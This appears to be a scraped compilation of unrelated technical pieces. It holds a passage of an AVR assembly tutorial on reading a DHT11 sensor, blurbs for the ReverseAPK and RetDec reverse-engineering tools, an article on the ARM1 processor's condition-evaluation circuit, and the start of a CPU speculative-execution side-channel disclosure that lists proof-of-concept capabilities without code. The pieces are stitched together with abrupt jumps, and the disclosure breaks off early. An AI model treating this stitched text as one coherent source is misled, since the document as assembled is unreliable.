EXIT_EXPECT_1:		LDI ERR_CODE, 1			; code 1: all good, Cycle_Count holds the iteration count
			RET

A similar subroutine, EXPECT_0, counts how many loop iterations pass while the line is at one, until the sensor pulls it back to zero.
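
To get a feel for the numbers such a polling loop produces, here is a small Python model of it. It is only a sketch: the figure of 7 cycles per iteration is my own tally of the loop body (INC, IN, a skipping SBRC, DEC, a taken BRNE) under standard AVR timings, the limit of 425 iterations follows from the 2 and 169 constants, and `fake_pin` is a hypothetical stand-in for the real input pin.

```python
F_CPU = 16_000_000          # Hz, Arduino Uno clock
CYCLES_PER_POLL = 7         # assumed cost of one pass through the polling loop


def polls_for(duration_us):
    """Approximate number of loop passes that fit into a pulse of this length."""
    return duration_us * (F_CPU // 1_000_000) // CYCLES_PER_POLL


def expect_level(read_pin, level, max_polls=425):
    """Poll read_pin() until it returns `level` or the pass budget runs out.

    Returns (True, count) on success and (False, count) on timeout,
    mirroring ERR_CODE 1 and 2 in the assembly version.
    """
    count = 0
    for _ in range(max_polls):
        count += 1                      # INC Cycle_Count
        if read_pin() == level:         # IN + SBRC + RJMP
            return True, count
    return False, count


def fake_pin(low_polls):
    """Demo pin: reads 0 for `low_polls` reads, then 1 forever."""
    state = {"reads": 0}

    def read():
        state["reads"] += 1
        return 1 if state["reads"] > low_polls else 0

    return read


for us in (27, 50, 70):
    print(us, "us ->", polls_for(us), "polls")
print(expect_level(fake_pin(polls_for(50)), 1))
```

With these assumptions every valid pulse yields a count well below 256, so a single 8-bit register is enough for Cycle_Count, and the timeout works out to very roughly 186 µs.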

To compute the delays we use the same approach as for blinking the LED: pick the parameters of an empty loop so that it produces the required pause. I used a dedicated calculator. If you prefer, you can count the instruction cycles by hand.

Our controller has quite a lot of memory, a whole 2 (two) kilobytes, so we will not be stingy and will simply store the counter values for all 80 intervals (40 bits, 2 intervals per bit) in memory.

Declare a variable:

CYCLES: .byte 80 ; buffer for the iteration counts

And store all the counts in memory.

;============== READ CYCLES ====================================
; read the sensor's bits and store the counts in CYCLES
READ_CYCLES:	LDI N_Cycles, 40			; 40 bits, two intervals each = 80 stored counts
READ:		NOP
		RCALL EXPECT_1				; the low interval has elapsed
		ST X+, Cycle_Count			; store the iteration count

		RCALL EXPECT_0
		ST X+, Cycle_Count			; store the iteration count

		DEC N_Cycles				; decrement the counter
		BRNE READ
		RET					; all intervals read

Now, for debugging, let's see how well the interval durations were measured and check that we really did read data from the sensor. The iteration count for the first "half-bit" should be roughly the same for every bit, while the count for the second "half-bit" should be either noticeably smaller or noticeably larger.

To send data to the desktop computer we use the controller's USART, which passes the data over the USB cable to a terminal program such as PuTTY. Again we transmit by brute force: wait until the USART data register is free and put the next byte into it. For convenience I also used a couple of helper subroutines: one to send several bytes starting at the address in Y, and one to emit a line break in the terminal for tidiness.

;============	SEND 1 BYTE VIA USART =====================
SEND_BYTE:	NOP
SEND_BYTE_L1:	LDS Tmp1, UCSR0A
		SBRS Tmp1, UDRE0			; wait until the data register is empty
		RJMP SEND_BYTE_L1
		STS UDR0, USART_ByteR		; then send the byte from R17
		NOP
		RET				

;============	SEND CRLF VIA USART ===============================
SEND_CRLF:	LDI USART_ByteR, $0D
		RCALL SEND_BYTE	
		LDI USART_ByteR, $0A
		RCALL SEND_BYTE
		RET			

;============	SEND N BYTES VIA USART ============================
; Y - what to send, USART_BytesN - how many bytes
SEND_BYTES:	NOP
SBS_L1:		LD USART_ByteR, Y+
		RCALL SEND_BYTE
		DEC USART_BytesN
		BRNE SBS_L1
		RET

Having sent the counts for all 80 intervals to the terminal, we can try to assemble the actual data bits. We do it by the book, i.e. by the datasheet: compare the count of the first "half-bit" with the count of the second, pair by pair. If the second half-bit is shorter, a zero is encoded; if it is longer, a one. After each comparison the bit is accumulated in an accumulator register, and the result is stored to memory byte by byte starting at address BITS.

;=============	GET BITS ===============================================
; build bytes in BITS from the counts in CYCLES
GET_BITS:			LDI Tmp1, 5			; five bytes: set up the counters
				LDI Tmp2, 8			; eight bits per byte
				LDI ZH, High(CYCLES)	; load the high byte of the CYCLES address
				LDI ZL, Low (CYCLES)	; load the low byte of the CYCLES address
				LDI YH, High(BITS)	; load the high byte of the BITS address
				LDI YL, Low (BITS)	; load the low byte of the BITS address

ACC:				LDI ACCUM, 0			; clear the accumulator
				LDI Tmp2, 8			; eight bits per byte

TO_ACC:				LSL ACCUM				; shift left
				LD Tmp3, Z+			; load count [i] (first half-bit)
				LD Tmp4, Z+			; and count [i+1] (second half-bit)
				CP Tmp3, Tmp4			; compare: first >= second means bit 0, first < second means bit 1
				BRSH J_SHIFT		; unsigned "same or higher" (0): the shift alone is enough
				ORI ACCUM, 1			; lower (1): set the low bit
J_SHIFT:			DEC Tmp2				; repeat for 8 bits
				BRNE TO_ACC
				ST Y+, ACCUM			; store the accumulator
				DEC Tmp1				; repeat for five bytes
				BRNE ACC
				RET

So we now have in memory, starting at label BITS, the five bytes the sensor sent. Working with them in this form is not very convenient, though, because in memory they look roughly like this:
34002100XX, where 34 is the integer part of the humidity, 00 is its fractional part, 21 is the temperature, 00 is again the fractional part of the temperature, and XX is the checksum. What we want is to print something neat in the terminal, like "Temperature = 21.00". So, for convenience, let's split the data into separate variables.

Definitions:

H10:			.byte 1		; humidity, integer part
H01:			.byte 1		; humidity, fractional part
T10:			.byte 1		; temperature in C, integer part
T01:			.byte 1		; temperature, fractional part

And copy the bytes from BITS into these variables:

;============	GET HnT DATA =========================================
; pull the values H10... out of BITS
; !!! a small hack: it relies on H10 and the following variables being laid out consecutively in memory

GET_HnT_DATA:	NOP

				LDI ZH, HIGH(BITS)
				LDI ZL, LOW(BITS)
				LDI XH, HIGH(H10)
				LDI XL, LOW(H10)
												; TODO - rewrite this with a counter
				LD Tmp1, Z+			; load
				ST X+, Tmp1			; store

				LD Tmp1, Z+			; load
				ST X+, Tmp1			; store

				LD Tmp1, Z+			; load
				ST X+, Tmp1			; store

				LD Tmp1, Z+			; load
				ST X+, Tmp1			; store

				RET
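
The unpacking above copies four bytes and does not look at the fifth. A minimal sketch of how the frame could also be validated is given below, in Python for illustration only. The function name is hypothetical, the sample bytes are made up, and the checksum rule (the fifth byte equals the low 8 bits of the sum of the first four) is taken from the DHT11 datasheet rather than from the code shown here.

```python
def parse_dht11_frame(frame):
    """Split a 5-byte DHT11 frame into named fields and verify the checksum."""
    if len(frame) != 5:
        raise ValueError("a DHT11 frame is exactly 5 bytes")
    h10, h01, t10, t01, checksum = frame
    if ((h10 + h01 + t10 + t01) & 0xFF) != checksum:
        raise ValueError("checksum mismatch")
    # Same names as the assembly variables H10, H01, T10, T01.
    return {"H10": h10, "H01": h01, "T10": t10, "T01": t01}


reading = parse_dht11_frame(bytes([0x34, 0x00, 0x21, 0x00, 0x55]))
print(reading)
```

Rejecting a frame with a bad checksum is cheap insurance against a mistimed read, which in this bit-banged scheme shows up as one or more flipped bits.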

After that we convert the numbers to ASCII codes so that the data is readable in the terminal, add the labels (e.g. "temperature") from flash, and send everything to the COM port and on to the terminal.
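
The conversion routine itself (HnT_ASCII_DATA_EX) is not shown in this article. One common way to do it on a CPU without a divide instruction is repeated subtraction of 10, sketched here in Python; this is an assumption about the approach, not the author's actual code, and both function names are hypothetical.

```python
def byte_to_ascii_digits(value):
    """Convert 0..99 into two ASCII digit codes using repeated subtraction."""
    if not 0 <= value <= 99:
        raise ValueError("only two-digit values are supported")
    tens = 0
    while value >= 10:          # subtract 10 until only the units remain
        value -= 10
        tens += 1
    return bytes([0x30 + tens, 0x30 + value])   # 0x30 is ASCII '0'


def format_reading(label, whole, frac):
    """Build a line such as b'Temperature = 21.00' (without the CR/LF)."""
    return (label.encode("ascii") + b" = "
            + byte_to_ascii_digits(whole) + b"." + byte_to_ascii_digits(frac))


print(format_reading("Temperature", 21, 0))
```

The line terminator is left out on purpose, since the main loop sends it separately with SEND_CRLF.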

PuTTY showing the data

To measure the temperature regularly, we add an endless loop with a delay of about 1200 milliseconds, since the DHT11 datasheet advises against polling the sensor more than once per second.

The main loop then looks roughly like this:

;============	MAIN
			;!!! Main entry point
RESET:			NOP		

			; Internal Hardware Init
			CLI		; we do not need interrupts for now
				
			; stack init		
			LDI Tmp1, Low(RAMEND)
			OUT SPL, Tmp1
			LDI Tmp1, High(RAMEND)
			OUT SPH, Tmp1

			RCALL USART0_INIT

			; Init data
			RCALL COPY_STRINGS		; copy the strings to RAM
			RCALL TEST_DATA			; prepare test data

loop:				NOP						; spin in the endless loop ....
				; External Hardware Init
				RCALL DHT_INIT
				; the sensor has acknowledged here and we must read the bits right away
				RCALL READ_CYCLES
				; the timing-critical section is over...

				; Test - send CYCLES to the USART
				;RCALL TEST_CYCLES

				; extract the bits from the message
				RCALL GET_BITS

				; Test - send BITS to the USART
				;RCALL TEST_BITS

				; extract the numeric values from BITS
				RCALL GET_HnT_DATA

				; Test - send 4 bytes starting at H10 to the USART
				;RCALL TEST_H10_T01

				; convert temperature and humidity to ASCII
				RCALL HnT_ASCII_DATA_EX

				; send the temperature (label and ASCII data) to the USART
				RCALL PRINT_TEMPER
				; send the humidity (label and ASCII data) to the USART
				RCALL PRINT_HUMID
				; emit a line break for tidiness
				RCALL SEND_CRLF

				RCALL DELAY_1200MS				; repeat every 1.2 seconds
				rjmp loop		; loop forever

Flash the board, connect the USB-TTL cable (converter) to the computer, start the terminal, pick the right virtual COM port, and enjoy our new digital thermometer. As a check you can warm the sensor in your hand: for me the temperature rises while the humidity, oddly enough, drops.

Related links:
AVR Delay Calc
How to connect an Arduino for programming in Atmel Studio 7
DHT11 Datasheet
ATmega DataSheet
Atmel AVR 8-bit Instruction Set
Atmel Studio
Example code on GitHub

ReverseAPK — Quickly Analyze And Reverse Engineer Android Packages

Quickly analyze and reverse engineer Android applications.

FEATURES:

  • Displays all extracted files for easy reference
  • Automatically decompile APK files to Java and Smali format
  • Analyze AndroidManifest.xml for common vulnerabilities and behavior
  • Static source code analysis for common vulnerabilities and behavior
    • Device info
    • Intents
    • Command execution
    • SQLite references
    • Logging references
    • Content providers
    • Broadcast receivers
    • Service references
    • File references
    • Crypto references
    • Hardcoded secrets
    • URLs
    • Network connections
    • SSL references
    • WebView references

INSTALL:

./install

USAGE:

reverse-apk <apk_name>

 

Retargetable Machine-Code Decompiler: RetDec

RetDec is a retargetable machine-code decompiler based on LLVM. The decompiler is not limited to any particular target architecture, operating system, or executable file format:

  • Supported file formats: ELF, PE, Mach-O, COFF, AR (archive), Intel HEX, and raw machine code.
  • Supported architectures (32b only): Intel x86, ARM, MIPS, PIC32, and PowerPC.

 

Features:

  • Static analysis of executable files with detailed information.
  • Compiler and packer detection.
  • Loading and instruction decoding.
  • Signature-based removal of statically linked library code.
  • Extraction and utilization of debugging information (DWARF, PDB).
  • Reconstruction of instruction idioms.
  • Detection and reconstruction of C++ class hierarchies (RTTI, vtables).
  • Demangling of symbols from C++ binaries (GCC, MSVC, Borland).
  • Reconstruction of functions, types, and high-level constructs.
  • Integrated disassembler.
  • Output in two high-level languages: C and a Python-like language.
  • Generation of call graphs, control-flow graphs, and various statistics.

 

After seven years of development, Avast open-sources its machine-code decompiler for platform-independent analysis of executable files. Avast released its analytical tool, RetDec, to help the cybersecurity community fight malicious software. The tool allows anyone to study the code of applications to see what the applications do, without running them. The goal behind open sourcing RetDec is to provide a generic tool to transform platform-specific code, such as x86/PE executable files, into a higher form of representation, such as C source code. By generic, we mean that the tool should not be limited to a single platform, but rather support a variety of platforms, including different architectures, file formats, and compilers. At Avast, RetDec is actively used for analysis of malicious samples for various platforms, such as x86/PE and ARM/ELF.

 

What is a decompiler?

A decompiler is a program that takes an executable file as its input and attempts to transform it into a high-level representation while preserving its functionality. For example, the input file may be application.exe, and the output can be source code in a higher-level programming language, such as C. A decompiler is, therefore, the exact opposite of a compiler, which compiles source files into executable files; this is why decompilers are sometimes also called reverse compilers.

By preserving a program’s functionality, we want the source code to reflect what the input program does as accurately as possible; otherwise, we risk assuming the program does one thing, when it really does another.

Generally, decompilers are unable to perfectly reconstruct original source code, due to the fact that a lot of information is lost during the compilation process. Furthermore, malware authors often use various obfuscation and anti-decompilation tricks to make the decompilation of their software as difficult as possible.

RetDec addresses the above-mentioned issues by using a large set of supported architectures and file formats, as well as in-house heuristics and algorithms to decode and reconstruct applications. RetDec is also the only decompiler of its scale using a proven LLVM infrastructure and provided for free, licensed under MIT.

Decompilers can be used in a variety of situations. The most obvious is reverse engineering when searching for bugs, vulnerabilities, or analyzing malicious software. Decompilation can also be used to retrieve lost source code, when comparing two executables, or to verify that a compiled program does exactly what is written in its source code.

There are several important differences between a decompiler and a disassembler. The former tries to reconstruct an executable file into platform-agnostic, high-level source code, while the latter gives you low-level, platform-specific assembly instructions. The assembly output is non-portable, error-prone when modified, and requires specific knowledge about the instruction set of the target processor. Another positive aspect of decompilers is the high-level source code they produce, like C source code, which can be read by people who know nothing about the assembly language for the particular processor being analyzed.

 

Installation and Use

Currently, RetDec supports only Windows (7 or later) and Linux.

 

Windows

  1. Either download and unpack a pre-built package from the following list, or build and install the decompiler by yourself (the process is described below):
  2. Install Microsoft Visual C++ Redistributable for Visual Studio 2015.
  3. Install MSYS2 and other needed applications by following RetDec’s Windows environment setup guide.
  4. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, go into $RETDEC_INSTALLED_DIR/bin and run:
    bash decompile.sh test.exe
    

    For more information, run bash decompile.sh --help.

 

Linux

  1. There are currently no pre-built packages for Linux. You will have to build and install the decompiler by yourself. The process is described below.
  2. After you have built the decompiler, you will need to install the following packages via your distribution’s package manager:
  3. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, go into $RETDEC_INSTALLED_DIR/bin and run:
    ./decompile.sh test.exe
    

    For more information, run ./decompile.sh --help.

 

Build and Installation


Requirements

Linux

On Debian-based distributions (e.g. Ubuntu), the required packages can be installed with apt-get:

sudo apt-get install build-essential cmake git perl python bash coreutils wget bc graphviz upx flex bison zlib1g-dev libtinfo-dev autoconf pkg-config m4 libtool

 

Windows

  • Microsoft Visual C++ (version >= Visual Studio 2015 Update 2)
  • Git
  • MSYS2 and some other applications. Follow RetDec’s Windows environment setup guide to get everything you need on Windows.
  • Active Perl. It needs to be the first Perl in PATH, or it has to be provided to CMake using CMAKE_PROGRAM_PATH variable, e.g. -DCMAKE_PROGRAM_PATH=/c/perl/bin.
  • Python (version >= 3.4)

 

Process

Warning: Currently, RetDec has to be installed into a clean, dedicated directory. Do NOT install it into /usr, /usr/local, etc., because our build system is not yet ready for system-wide installations. So, when running cmake, always set -DCMAKE_INSTALL_PREFIX=<path> to a directory that will be used just by RetDec.

  • Recursively clone the repository (it contains submodules):
    • git clone --recursive https://github.com/avast-tl/retdec
  • Linux:
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path>
    • make && make install
  • Windows:
    • Open MSBuild command prompt, or any terminal that is configured to run the msbuild command.
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path> -G<generator>
    • msbuild /m /p:Configuration=Release retdec.sln
    • msbuild /m /p:Configuration=Release INSTALL.vcxproj
    • Alternatively, you can open retdec.sln generated by cmake in Visual Studio IDE.

You have to pass the following parameters to cmake:

  • -DCMAKE_INSTALL_PREFIX=<path> to set the installation path to <path>.
  • (Windows only) -G<generator> is -G"Visual Studio 14 2015" for 32-bit build using Visual Studio 2015, or -G"Visual Studio 14 2015 Win64" for 64-bit build using Visual Studio 2015. Later versions of Visual Studio may be used.

You can pass the following additional parameters to cmake:

  • -DRETDEC_DOC=ON to build with API documentation (requires Doxygen and Graphviz, disabled by default).
  • -DRETDEC_TESTS=ON to build with tests, including all the tests in dependency submodules (disabled by default).
  • -DCMAKE_BUILD_TYPE=Debug to build with debugging information, which is useful during development. By default, the project is built in the Release mode. This has no effect on Windows, but the same thing can be achieved by running msbuild with the /p:Configuration=Debug parameter.
  • -DCMAKE_PROGRAM_PATH=<path> to use Perl at <path> (probably useful only on Windows).

Conditional instructions in the ARM1 processor, reverse engineered

By carefully examining the layout of the ARM1 processor, it can be reverse engineered. This article describes the interesting circuit used for conditional instructions: this circuit is marked in red on the die photo below. Unlike most processors, the ARM executes every instruction conditionally. Each instruction specifies a condition and is only executed if the condition is satisfied. For every instruction, the condition circuit reads the condition from the instruction register (blue), evaluates the condition flags (purple), and informs the control logic (yellow) if the instruction should be executed or skipped.

The ARM1 processor chip showing the condition evaluation circuit (red) and the main components it interacts with. Original photo courtesy of Computer History Museum.

Why care about the ARM1 chip? It is the highly influential ancestor of the extremely popular ARM processor. The ARM1 processor got off to a slow start in 1985, but ARM processors are now sold by the tens of billions; your smartphone probably runs on ARM. This article is part of my series on reverse engineering the ARM1; start with my first article for an overview of the chip.

What are conditional instructions?

A key part of any computer is the ability of a program to change what it is doing based on various conditions. Most computers provide conditional branch instructions, which cause execution to jump to a different part of the program based on various condition flags. For example, consider the code if (x == 0) { do_something }. Compiled to assembly code, this first tests the value of variable x and sets the Zero flag if x is 0. Next, a conditional branch instruction jumps over the do_something code if the Zero flag is not set.

The ARM processor takes conditionals much further than other processors: every instruction becomes a conditional instruction. Every instruction includes one of 16 conditions and the instruction is only executed if the condition is true; otherwise the instruction is skipped. (This is also known as predication.) The motivation is to avoid inefficient jumping around in the code.

The ARM manual excerpt below shows how four bits in each 32-bit instruction specify one of 16 conditions. Most of the conditions are straightforward, checking if values are equal, negative, higher, and so forth. Most instructions will use the "always" condition, which simply means the instruction always executes. The opposite "never" condition is not highly useful (an instruction with that condition never executes), but it can be used for a NOP, patching code, or adjusting timing of an instruction sequence.

Every instruction in the ARM processor has one of 16 conditions specified. The instruction is executed only if the condition is satisfied.

Studying the different conditions reveals much of how the condition circuit works. It is based on four condition flags. The zero (Z) flag is set if a value is zero. The negative (N) flag is set if a value is negative. The carry (C) flag is set if there is a carry or borrow from addition or subtraction. The overflow (V) flag is set if there is an overflow during signed arithmetic (details).

The top three bits of the instruction select one of eight conditions, as highlighted in yellow. The fourth bit selects the condition or its opposite (blue). If the fourth bit is 0, the condition must be true; if the fourth bit is 1, the condition must be false.
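
The selection scheme just described can be written down as a tiny truth-function. The Python below is only an illustrative model of the documented ARM condition encoding (EQ/NE, CS/CC, MI/PL, VS/VC, HI/LS, GE/LT, GT/LE, AL/NV); the names `BASE_CONDITIONS` and `condition_passed` are my own.

```python
# Eight base conditions, indexed by the top three bits of the 4-bit field.
BASE_CONDITIONS = [
    lambda n, z, c, v: z,                    # 000x  EQ / NE
    lambda n, z, c, v: c,                    # 001x  CS / CC
    lambda n, z, c, v: n,                    # 010x  MI / PL
    lambda n, z, c, v: v,                    # 011x  VS / VC
    lambda n, z, c, v: c and not z,          # 100x  HI / LS
    lambda n, z, c, v: n == v,               # 101x  GE / LT
    lambda n, z, c, v: (n == v) and not z,   # 110x  GT / LE
    lambda n, z, c, v: True,                 # 111x  AL / NV
]


def condition_passed(cond, n, z, c, v):
    """Return True if the 4-bit condition `cond` holds for flags N, Z, C, V."""
    base = bool(BASE_CONDITIONS[cond >> 1](n, z, c, v))
    invert = bool(cond & 1)          # lowest bit selects the opposite condition
    return base != invert


# EQ (0b0000) with Z set executes; NE (0b0001) with Z set is skipped.
print(condition_passed(0b0000, n=False, z=True, c=False, v=False))
print(condition_passed(0b0001, n=False, z=True, c=False, v=False))
```

Storing only eight base conditions and one inversion bit is what lets the hardware get by with an 8-way multiplexer instead of a 16-way one.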

Implementation of the circuit

The implementation of the conditional logic circuit matches the above description. First, the eight conditions are generated from the four flags. One of the conditions is selected based on the three instruction bits. If the fourth instruction bit is set, the condition is flipped. The result is 1 if the condition is satisfied, and 0 if the condition is not satisfied. One unexpected part of the circuit is that an undefined instruction or an interrupt causes the condition to be cleared, preventing execution of the instruction. The resulting condition signal output is connected to a control part of the chip, where it causes the instruction to be executed or not, as desired.

The condition code evaluation circuit from the ARM1 processor.

The diagram above shows the condition code circuit of the chip as it appears in the simulator; this is a zoomed-in version of the red rectangle indicated on the die earlier. The chip consists of multiple layers, indicated by different colors. Transistors appear as red or blue regions. NMOS transistors are red; they turn on with a 1 input and can pull their output low. PMOS transistors (blue) are complementary; they turn on with a 0 input and can pull their output high. Physically above the transistors is the polysilicon wiring layer (green). When polysilicon crosses a transistor it forms the gate (yellow) that controls the transistor. Finally, two layers of metal wiring (gray) are above the polysilicon.

The circuit is arranged in columns. The first column of transistors forms the logic gates to generate the conditions from the flag values. The next column is the multiplexer, a circuit that takes the eight input conditions and selects one. The rightmost column contains 8 NAND gates that decode the three instruction bits into 8 control lines. Each line is fed into the multiplexer to select the corresponding condition. At the right is the wiring for the 3 instruction bits and their complements. A few miscellaneous gates are at the bottom of the multiplexer and decoder columns. These include inverters to complement the instruction bits.

The condition generation gates

The diagram below zooms in on the left third of the circuit above. This part of the circuit uses standard CMOS logic gates to compute the conditions from the flags. Each gate is built from NMOS (red) and PMOS (blue) transistors in a horizontal strip. Comparing the text description of conditions from the manual with the logic shows how the conditions are generated. For instance, the HI (unsigned higher) condition requires flags «C set and Z clear». The top three gates generate this condition. The GE (greater than or equal) condition is more complex, requiring flags «N set and V set, or N clear and V clear». The next two gates compute this value. (Due to the way CMOS gates are constructed, an OR-NAND gate is constructed as a single gate.) Likewise, the other conditions are generated. The AL (always) condition is simply a 1, and doesn’t require any circuitry. The conditions are fed into the multiplexer, which will be discussed below.

The output coming back from the multiplexer is the selected condition, labeled «cond» below. The NAND and OR-NAND gates flip the condition if instruction register bit 28 (ireg28) is set. This implements the eight opposite conditions. The result is labeled «ok», indicating the overall condition is satisfied. The final three gates block instruction execution for an interrupt or undefined instruction.
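The behavior of the whole circuit can be summarized in a few lines of C. This is only a behavioral sketch, not a gate-level model: the struct and function names are made up for illustration, and the order of the eight base conditions follows the standard ARM condition-code table (EQ, CS, MI, VS, HI, GE, GT, AL) rather than anything read off the die.

```c
#include <stdbool.h>
#include <stdint.h>

/* The four flags: N (negative), Z (zero), C (carry), V (overflow). */
struct flags { bool n, z, c, v; };

/* cond4 is the 4-bit condition field (instruction bits 31..28).
 * Bits 31..29 select one of eight base conditions; bit 28 (ireg28)
 * flips the selected condition. "blocked" stands for the interrupt /
 * undefined-instruction signals that force the result to 0. */
static bool condition_ok(uint8_t cond4, struct flags f, bool blocked)
{
    const bool base[8] = {
        f.z,                   /* 000: EQ, Z set */
        f.c,                   /* 001: CS, C set */
        f.n,                   /* 010: MI, N set */
        f.v,                   /* 011: VS, V set */
        f.c && !f.z,           /* 100: HI, C set and Z clear */
        f.n == f.v,            /* 101: GE, N and V equal */
        !f.z && (f.n == f.v),  /* 110: GT, Z clear and N equals V */
        true                   /* 111: AL, always */
    };
    bool cond = base[(cond4 >> 1) & 7];  /* the multiplexer */
    bool flip = (cond4 & 1) != 0;        /* ireg28 */
    bool ok = (cond != flip);            /* flip when ireg28 is set */
    return ok && !blocked;
}
```

For example, with only the Z flag set, condition field 0x0 (EQ) passes and 0x1 (NE, its flipped counterpart) fails.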

Gates in the ARM1 processor generate the various conditionals from the flag values.


One thing I’d like to emphasize about the ARM1 is that its layout is very orderly and non-optimized. While it may appear chaotic, the gates are arranged by combining relatively fixed blocks («standard cells») and wiring them together. Each gate forms a strip and the gates are stacked together in columns. The polysilicon and metal layers connect the gates as necessary.

The layout of the ARM1 chip is a consequence of the VLSI Technology chip design software used to create it. The resulting layout is simple, but doesn’t use space very efficiently. Since the ARM1 uses very few transistors for its time, the designers weren’t worried about optimizing the layout. In contrast, earlier chips such as the Z-80 were hand-drawn, with each transistor and wire carefully shaped to use the minimum space possible. The diagram below shows a small part of the Z-80 processor layout, showing the extremely irregular but dense arrangement of the chip. The transistors are not arranged in rows as in the ARM1 above, but fit together to use all the available space.

A detail of the Z-80 processor layout, showing the complex hand-drawn layout. Each transistor and wire is carefully shaped to minimize the chip's size.


The multiplexer and decoders

Selecting the desired condition out of the eight possibilities is the job of a circuit called the multiplexer. The multiplexer takes 8 inputs (the conditions) and 8 control signals (based on the instruction) and selects the desired condition. To the right of the multiplexer, 8 NAND gates generate the 8 control signals by decoding the three instruction bits. Each gate simply looks at three bit values and outputs a 0 if the bits select that condition. For instance, if the first two bits are 0 and the third is 1, the gate for condition 1 outputs a 0, selecting that condition in the multiplexer. The animation below shows the circuit as the instruction bits cycle through the eight conditions. You can see the activated condition moving downwards through the circuit.

Animation of the multiplexer in the ARM1 condition code evaluation circuit.


While a multiplexer can be built from standard logic gates, the ARM1 multiplexer is built from a different type of circuitry called transmission gates (which the ARM1 also uses in its bit counter). A multiplexer built from transmission gates is more compact and faster than one built from standard logic (NAND gates). One feature of CMOS is that by combining an NMOS transistor and a PMOS transistor in parallel, a transmission gate switch can be built. Feeding 1 into the NMOS gate and 0 into the PMOS gate turns on both transistors and they pass their input through. With the opposite gate values, both transistors turn off and the switch opens. The multiplexer is built from 8 of these CMOS switches. Each condition input feeds into one switch, and the switch outputs are connected together. One switch is turned on at a time, selecting the corresponding input as the output value.

The diagram below shows the schematic of the multiplexer as well as its physical layout on the chip. Only the first three segments of the eight are shown; the remainder are similar. Each input is connected to two transistors forming a CMOS switch. Because the NMOS and PMOS gates require opposite signals, the multiplexer has an inverter for each control signal. Each inverter also consists of two transistors, but wired differently from the switch.


Schematic and diagram of the multiplexer inside the ARM1 processor’s condition code evaluation circuit.

Working together, the decode circuit, inverters, and CMOS switches form the multiplexer that selects the desired condition from the eight choices. The logic described earlier allows this condition to be flipped, for a total of 16 possible conditions.
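As a rough software analogy for the decoder and the switches, the sketch below decodes the three select bits into eight active-low control lines (one 0, seven 1s, like the outputs of the eight NAND gates) and then lets the single enabled switch drive the shared output. The function names are illustrative, and the model ignores analog details such as the per-switch inverters.

```c
#include <stdbool.h>
#include <stdint.h>

/* Decode three select bits into eight active-low control lines.
 * Exactly one bit of the result is 0: the line for the selected input. */
static uint8_t decode_active_low(uint8_t sel3)
{
    return (uint8_t)~(1u << (sel3 & 7));
}

/* Eight switches with their outputs wired together. Switch i conducts
 * when control line i is 0, so exactly one input reaches the output. */
static bool mux8(const bool inputs[8], uint8_t sel3)
{
    uint8_t lines = decode_active_low(sel3);
    bool out = false;
    for (int i = 0; i < 8; i++) {
        bool conducting = ((lines >> i) & 1) == 0;
        if (conducting)
            out = inputs[i];
    }
    return out;
}
```

With select bits 001, `decode_active_low` returns 0xFD: only line 1 is low, which matches the example of the gate for condition 1 outputting a 0.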

Conclusion

One unusual feature of the ARM instruction set is that every instruction has a condition associated with it and is only executed if the condition is true. The ARM1 chip is simple enough that the condition circuitry on the chip can be examined and understood at the transistor and gate level. Now that you’ve seen the internals of the condition logic, you can use the Visual ARM1 simulator to see the circuit in action. While the ARM1 may seem like a historical artifact of the 1980s, ARM processors power most smartphones, so there’s probably a similar circuit controlling your phone right now.

Reading privileged memory with a side-channel

We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts.

 

Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. We reported this issue to Intel, AMD and ARM on 2017-06-01 [1].

 

So far, there are three known variants of the issue:

 

  • Variant 1: bounds check bypass (CVE-2017-5753)
  • Variant 2: branch target injection (CVE-2017-5715)
  • Variant 3: rogue data cache load (CVE-2017-5754)

 

Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:

 

 

During the course of our research, we developed the following proofs of concept (PoCs):

 

  1. A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
  2. A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel’s BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
  3. A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian’s distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn’t been tested.)
  4. A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

 

For interesting resources around this topic, look down into the «Literature» section.

 

A warning regarding explanations about processor internals in this blogpost: This blogpost contains a lot of speculation about hardware internals based on observed behavior, which might not necessarily correspond to what processors are actually doing.

 

We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.

 

The PoC code and the writeups that we sent to the CPU vendors are available here: https://bugs.chromium.org/p/project-zero/issues/detail?id=1272.

Tested Processors

  • Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called «Intel Haswell Xeon CPU» in the rest of this document)
  • AMD FX(tm)-8320 Eight-Core Processor (called «AMD FX CPU» in the rest of this document)
  • AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called «AMD PRO CPU» in the rest of this document)
